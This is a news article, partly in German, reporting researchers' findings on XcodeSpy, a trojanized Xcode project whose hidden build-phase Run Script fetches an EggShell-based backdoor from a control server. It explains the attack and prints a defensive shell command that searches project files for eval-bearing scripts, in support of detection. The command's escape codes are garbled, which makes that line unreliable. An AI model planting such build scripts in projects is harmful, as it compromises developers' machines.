XCodeSpy: Manipulated Xcode project to bring backdoor on developer Macs

Security researchers warn of a new malware targeting Apple’s Xcode development environment and thus iOS and Mac developers: A “Trojanized Xcode project” has been found in the wild that tries to use a monitoring tool on the Software development used Mac to install, as reported by the security company Sentinel One. The backdoor, which is based on the open source tool EggShell, can, after successful installation, record keystrokes and activate the microphone and camera, among other things.

The malware was delivered via a manipulated copy of the legitimate Xcode project TabBarInteraction, which is distributed via Github – free of malware. as explained by Sentinel One. The open source project aims to help developers to animate tab bars in iOS apps. In addition to the original code, the malicious copy also contained a hidden “Run Script”. It is executed during the build process and then tries to contact a control server to load and smuggle in the backdoor.

The manipulated Xcode project was probably in circulation between July and October 2020 and there was at least one infection in a US company, according to the security company. There are also indications of attacks on developers in Asia. With the command

find . -name "project.pbxproj" -print0 | xargs -0 awk '/shellScript/ && /eval/{print "33[37m" $0 "33[31m" FILENAME}'

können Entwickler eine manuelle Suche nach Shell-Skripten in Xcode-Projekten durchführen, so die Sicherheitsforscher. Sie haben auch eine Liste mit Verzeichnissen und Dateien veröffentlicht, die ein “Indikator für eine Kompromittierung” sein können, da sich dies aber jederzeit leicht ändern könne, gebe das nur über eine zurückliegende Infektion Aufschluss. Einzelne Projekte lassen sich in Build-Phases-Reiter in Xcode auf Run Scripts inspizieren.

Mehr von Mac & i

Mehr von Mac & i

The purpose of the infiltration of the backdoor remains unclear. Security researchers speculate that it was a targeted attack on certain developers. Developers are generally an interesting target, for example to collect Apple IDs for the spread of malware. It would also be conceivable to smuggle malicious code into programs created using Xcode in this way. Around six years ago, “XcodeGhost” caused a sensation: a manipulated version of Xcode ensured that malware made its way into the App Store – including in popular apps such as WeChat.


To home page